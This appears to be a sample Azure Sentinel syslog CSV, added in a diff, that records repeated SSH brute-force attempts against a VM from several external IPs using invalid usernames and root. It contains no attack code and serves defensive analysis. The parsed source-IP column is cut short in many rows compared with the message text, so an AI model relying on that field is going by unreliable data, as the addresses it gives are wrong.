+11646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:16,UbuntuDevEnv,2019-06-26 00:40:16,auth,UbuntuDevEnv,info,Invalid user lefty from 131.100.219.3 port 51414,75717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lefty,131.100.219.3,51414,,
+11647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:16,UbuntuDevEnv,2019-06-26 00:40:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:16,UbuntuDevEnv,2019-06-26 00:40:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,75717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:18,UbuntuDevEnv,2019-06-26 00:40:17,auth,UbuntuDevEnv,info,Failed password for invalid user lefty from 131.100.219.3 port 51414 ssh2,75717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lefty,131.100.219.3,51414,,
+11650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:19,UbuntuDevEnv,2019-06-26 00:40:18,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 51414:11: Bye Bye [preauth],75717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,51414,,
+11651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:19,UbuntuDevEnv,2019-06-26 00:40:18,auth,UbuntuDevEnv,info,Disconnected from invalid user lefty 131.100.219.3 port 51414 [preauth],75717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lefty,131.100.219.3,51414,,
+11652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:21,UbuntuDevEnv,2019-06-26 00:40:21,auth,UbuntuDevEnv,info,Invalid user di from 104.248.121.67 port 37894,75737,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,di,104.248.121.6,37894,,
+11653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:21,UbuntuDevEnv,2019-06-26 00:40:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,75737,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:21,UbuntuDevEnv,2019-06-26 00:40:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75737,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:24,UbuntuDevEnv,2019-06-26 00:40:23,auth,UbuntuDevEnv,info,Failed password for invalid user di from 104.248.121.67 port 37894 ssh2,75737,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,di,104.248.121.6,37894,,
+11656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:24,UbuntuDevEnv,2019-06-26 00:40:23,auth,UbuntuDevEnv,info,Disconnected from invalid user di 104.248.121.67 port 37894 [preauth],75737,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,di,104.248.121.6,37894,,
+11657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:40:24,UbuntuDevEnv,2019-06-26 00:40:23,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 37894:11: Bye Bye [preauth],75737,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,37894,,
+11658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:08,UbuntuDevEnv,2019-06-26 00:41:07,auth,UbuntuDevEnv,info,Invalid user yin from 118.222.146.186 port 42200,75899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,118.222.146.1,42200,,
+11659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:08,UbuntuDevEnv,2019-06-26 00:41:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:08,UbuntuDevEnv,2019-06-26 00:41:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,75899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:11,UbuntuDevEnv,2019-06-26 00:41:10,auth,UbuntuDevEnv,info,Failed password for invalid user yin from 118.222.146.186 port 42200 ssh2,75899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,118.222.146.1,42200,,
+11662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:11,UbuntuDevEnv,2019-06-26 00:41:10,auth,UbuntuDevEnv,info,Disconnected from invalid user yin 118.222.146.186 port 42200 [preauth],75899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,118.222.146.1,42200,,
+11663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:11,UbuntuDevEnv,2019-06-26 00:41:10,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 42200:11: Bye Bye [preauth],75899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,42200,,
+11664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:52,UbuntuDevEnv,2019-06-26 00:41:51,auth,UbuntuDevEnv,info,Invalid user mega from 104.248.121.67 port 46337,76062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mega,104.248.121.6,46337,,
+11665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:52,UbuntuDevEnv,2019-06-26 00:41:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:52,UbuntuDevEnv,2019-06-26 00:41:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,76062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:53,UbuntuDevEnv,2019-06-26 00:41:52,auth,UbuntuDevEnv,info,Failed password for invalid user mega from 104.248.121.67 port 46337 ssh2,76062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mega,104.248.121.6,46337,,
+11668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:53,UbuntuDevEnv,2019-06-26 00:41:52,auth,UbuntuDevEnv,info,Disconnected from invalid user mega 104.248.121.67 port 46337 [preauth],76062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mega,104.248.121.6,46337,,
+11669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:53,UbuntuDevEnv,2019-06-26 00:41:52,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 46337:11: Bye Bye [preauth],76062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,46337,,
+11670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:54,UbuntuDevEnv,2019-06-26 00:41:53,auth,UbuntuDevEnv,info,Invalid user msfuser from 186.31.116.78 port 59612,76072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msfuser,186.31.116.7,59612,,
+11671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:54,UbuntuDevEnv,2019-06-26 00:41:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,76072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:54,UbuntuDevEnv,2019-06-26 00:41:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:57,UbuntuDevEnv,2019-06-26 00:41:56,auth,UbuntuDevEnv,info,Failed password for invalid user msfuser from 186.31.116.78 port 59612 ssh2,76072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msfuser,186.31.116.7,59612,,
+11674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:57,UbuntuDevEnv,2019-06-26 00:41:56,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 59612:11: Bye Bye [preauth],76072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,59612,,
+11675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:41:57,UbuntuDevEnv,2019-06-26 00:41:56,auth,UbuntuDevEnv,info,Disconnected from invalid user msfuser 186.31.116.78 port 59612 [preauth],76072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msfuser,186.31.116.7,59612,,
+11676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:33,UbuntuDevEnv,2019-06-26 00:42:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3  user=root,76206,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,131.100.219.3,,0,
+11677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:34,UbuntuDevEnv,2019-06-26 00:42:34,auth,UbuntuDevEnv,info,Failed password for root from 131.100.219.3 port 39582 ssh2,76206,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,39582,,
+11678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:34,UbuntuDevEnv,2019-06-26 00:42:34,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 131.100.219.3 port 39582 [preauth],76206,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,131.100.219.3,39582,,
+11679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:34,UbuntuDevEnv,2019-06-26 00:42:34,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 39582:11: Bye Bye [preauth],76206,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,39582,,
+11680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:47,UbuntuDevEnv,2019-06-26 00:42:47,auth,UbuntuDevEnv,info,Invalid user wpyan from 118.222.146.186 port 58962,76261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,118.222.146.1,58962,,
+11681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:47,UbuntuDevEnv,2019-06-26 00:42:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:47,UbuntuDevEnv,2019-06-26 00:42:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,76261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:49,UbuntuDevEnv,2019-06-26 00:42:49,auth,UbuntuDevEnv,info,Failed password for invalid user wpyan from 118.222.146.186 port 58962 ssh2,76261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,118.222.146.1,58962,,
+11684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:49,UbuntuDevEnv,2019-06-26 00:42:49,auth,UbuntuDevEnv,info,Disconnected from invalid user wpyan 118.222.146.186 port 58962 [preauth],76261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,118.222.146.1,58962,,
+11685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:42:49,UbuntuDevEnv,2019-06-26 00:42:49,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 58962:11: Bye Bye [preauth],76261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,58962,,
+11686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:20,UbuntuDevEnv,2019-06-26 00:43:20,auth,UbuntuDevEnv,info,Invalid user msfuser from 104.248.121.67 port 54775,76377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msfuser,104.248.121.6,54775,,
+11687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:20,UbuntuDevEnv,2019-06-26 00:43:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:20,UbuntuDevEnv,2019-06-26 00:43:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,76377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:21,UbuntuDevEnv,2019-06-26 00:43:21,auth,UbuntuDevEnv,info,Failed password for invalid user msfuser from 104.248.121.67 port 54775 ssh2,76377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msfuser,104.248.121.6,54775,,
+11690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:21,UbuntuDevEnv,2019-06-26 00:43:21,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 54775:11: Bye Bye [preauth],76377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,54775,,
+11691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:21,UbuntuDevEnv,2019-06-26 00:43:21,auth,UbuntuDevEnv,info,Disconnected from invalid user msfuser 104.248.121.67 port 54775 [preauth],76377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msfuser,104.248.121.6,54775,,
+11692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:47,UbuntuDevEnv,2019-06-26 00:43:47,auth,UbuntuDevEnv,info,Invalid user cosmos from 186.31.116.78 port 40180,76478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cosmos,186.31.116.7,40180,,
+11693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:47,UbuntuDevEnv,2019-06-26 00:43:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:47,UbuntuDevEnv,2019-06-26 00:43:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,76478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:49,UbuntuDevEnv,2019-06-26 00:43:48,auth,UbuntuDevEnv,info,Failed password for invalid user cosmos from 186.31.116.78 port 40180 ssh2,76478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cosmos,186.31.116.7,40180,,
+11696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:49,UbuntuDevEnv,2019-06-26 00:43:49,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 40180:11: Bye Bye [preauth],76478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,40180,,
+11697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:43:49,UbuntuDevEnv,2019-06-26 00:43:49,auth,UbuntuDevEnv,info,Disconnected from invalid user cosmos 186.31.116.78 port 40180 [preauth],76478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cosmos,186.31.116.7,40180,,
+11698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:24,UbuntuDevEnv,2019-06-26 00:44:23,auth,UbuntuDevEnv,info,Invalid user zu from 118.222.146.186 port 47498,76598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zu,118.222.146.1,47498,,
+11699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:24,UbuntuDevEnv,2019-06-26 00:44:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,76598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:24,UbuntuDevEnv,2019-06-26 00:44:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:26,UbuntuDevEnv,2019-06-26 00:44:25,auth,UbuntuDevEnv,info,Failed password for invalid user zu from 118.222.146.186 port 47498 ssh2,76598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zu,118.222.146.1,47498,,
+11702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:26,UbuntuDevEnv,2019-06-26 00:44:26,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 47498:11: Bye Bye [preauth],76598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,47498,,
+11703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:26,UbuntuDevEnv,2019-06-26 00:44:26,auth,UbuntuDevEnv,info,Disconnected from invalid user zu 118.222.146.186 port 47498 [preauth],76598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zu,118.222.146.1,47498,,
+11704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:46,UbuntuDevEnv,2019-06-26 00:44:45,auth,UbuntuDevEnv,info,Invalid user ofbiz from 104.248.121.67 port 34980,76692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ofbiz,104.248.121.6,34980,,
+11705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:46,UbuntuDevEnv,2019-06-26 00:44:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
